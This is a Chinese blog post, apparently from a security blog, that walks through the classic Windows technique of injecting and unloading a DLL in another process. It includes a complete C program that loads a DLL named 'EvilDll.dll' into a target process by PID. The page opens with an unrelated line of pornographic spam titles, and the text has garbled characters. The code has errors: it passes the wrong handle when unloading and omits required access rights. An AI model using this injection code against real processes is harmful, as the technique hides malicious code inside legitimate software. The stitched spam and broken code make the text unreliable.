免费视频淫片aa毛片_日韩高清在线亚洲专区vr_日韩大片免费观看视频播放_亚洲欧美国产精品完整版

Pnig0s1992:算是復(fù)習(xí)了，最經(jīng)典的教科書式的Dll注入。

總結(jié)一下基本的注入過(guò)程，分注入和卸載

注入Dll：

1，OpenProcess獲得要注入進(jìn)程的句柄

2，VirtualAllocEx在遠(yuǎn)程進(jìn)程中開辟出一段內(nèi)存，長(zhǎng)度為strlen(dllname)+1;

3，WriteProcessMemory將Dll的名字寫入第二步開辟出的內(nèi)存中。

4，CreateRemoteThread將LoadLibraryA作為線程函數(shù)，參數(shù)為Dll的名稱，創(chuàng)建新線程

5，CloseHandle關(guān)閉線程句柄

卸載Dll：

1，CreateRemoteThread將GetModuleHandle注入到遠(yuǎn)程進(jìn)程中，參數(shù)為被注入的Dll名

2，GetExitCodeThread將線程退出的退出碼作為Dll模塊的句柄值。

3，CloseHandle關(guān)閉線程句柄

3，CreateRemoteThread將FreeLibraryA注入到遠(yuǎn)程進(jìn)程中，參數(shù)為第二步獲得的句柄值。

4，WaitForSingleObject等待對(duì)象句柄返回

5，CloseHandle關(guān)閉線程及進(jìn)程句柄。

//Code By Pnig0s1992 
//Date:2012,3,13 
#include <stdio.h> 
#include <Windows.h> 
#include <TlHelp32.h> 
 
 
DWORD getProcessHandle(LPCTSTR lpProcessName)//根據(jù)進(jìn)程名查找進(jìn)程PID 
{ 
    DWORD dwRet = 0; 
    HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); 
    if(hSnapShot == INVALID_HANDLE_VALUE) 
    { 
        printf("\n獲得進(jìn)程快照失敗%d",GetLastError()); 
        return dwRet; 
    } 
 
    PROCESSENTRY32 pe32;//聲明進(jìn)程入口對(duì)象 
    pe32.dwSize = sizeof(PROCESSENTRY32);//填充進(jìn)程入口對(duì)象大小 
    Process32First(hSnapShot,&pe32);//遍歷進(jìn)程列表 
    do  
    { 
        if(!lstrcmp(pe32.szExeFile,lpProcessName))//查找指定進(jìn)程名的PID 
        { 
            dwRet = pe32.th32ProcessID; 
            break; 
        } 
    } while (Process32Next(hSnapShot,&pe32)); 
    CloseHandle(hSnapShot); 
    return dwRet;//返回 
} 
 
INT main(INT argc,CHAR * argv[]) 
{ 
    DWORD dwPid = getProcessHandle((LPCTSTR)argv[1]); 
    LPCSTR lpDllName = "EvilDll.dll"; 
    HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,dwPid); 
    if(hProcess == NULL) 
    { 
        printf("\n獲取進(jìn)程句柄錯(cuò)誤%d",GetLastError()); 
        return -1; 
    } 
    DWORD dwSize = strlen(lpDllName)+1;  
    DWORD dwHasWrite; 
    LPVOID lpRemoteBuf = VirtualAllocEx(hProcess,NULL,dwSize,MEM_COMMIT,PAGE_READWRITE); 
    if(WriteProcessMemory(hProcess,lpRemoteBuf,lpDllName,dwSize,&dwHasWrite)) 
    { 
        if(dwHasWrite != dwSize) 
        { 
            VirtualFreeEx(hProcess,lpRemoteBuf,dwSize,MEM_COMMIT); 
            CloseHandle(hProcess); 
            return -1; 
        } 
 
    }else 
    { 
        printf("\n寫入遠(yuǎn)程進(jìn)程內(nèi)存空間出錯(cuò)%d。",GetLastError()); 
        CloseHandle(hProcess); 
        return -1; 
    } 
 
    DWORD dwNewThreadId; 
    LPVOID lpLoadDll = LoadLibraryA; 
    HANDLE hNewRemoteThread = CreateRemoteThread(hProcess,NULL,0,(LPTHREAD_START_ROUTINE)lpLoadDll,lpRemoteBuf,0,&dwNewThreadId); 
    if(hNewRemoteThread == NULL) 
    { 
        printf("\n建立遠(yuǎn)程線程失敗%d",GetLastError()); 
        CloseHandle(hProcess); 
        return -1; 
    } 
 
    WaitForSingleObject(hNewRemoteThread,INFINITE); 
    CloseHandle(hNewRemoteThread); 
 
    //準(zhǔn)備卸載之前注入的Dll 
    DWORD dwHandle,dwID; 
    LPVOID pFunc = GetModuleHandleA;//獲得在遠(yuǎn)程線程中被注入的Dll的句柄 
    HANDLE hThread = CreateRemoteThread(hProcess,NULL,0,(LPTHREAD_START_ROUTINE)pFunc,lpRemoteBuf,0,&dwID); 
    WaitForSingleObject(hThread,INFINITE); 
    GetExitCodeThread(hThread,&dwHandle);//線程的結(jié)束碼即為Dll模塊兒的句柄 
    CloseHandle(hThread); 
    pFunc = FreeLibrary; 
    hThread = CreateRemoteThread(hThread,NULL,0,(LPTHREAD_START_ROUTINE)pFunc,(LPVOID)dwHandle,0,&dwID); //將FreeLibraryA注入到遠(yuǎn)程線程中去卸載Dll 
    WaitForSingleObject(hThread,INFINITE); 
    CloseHandle(hThread); 
    CloseHandle(hProcess); 
    return 0; 
} 

本文出自 “About:Blank H4cking” 博客，請(qǐng)務(wù)必保留此出處http://pnig0s1992.blog.51cto.com/393390/804484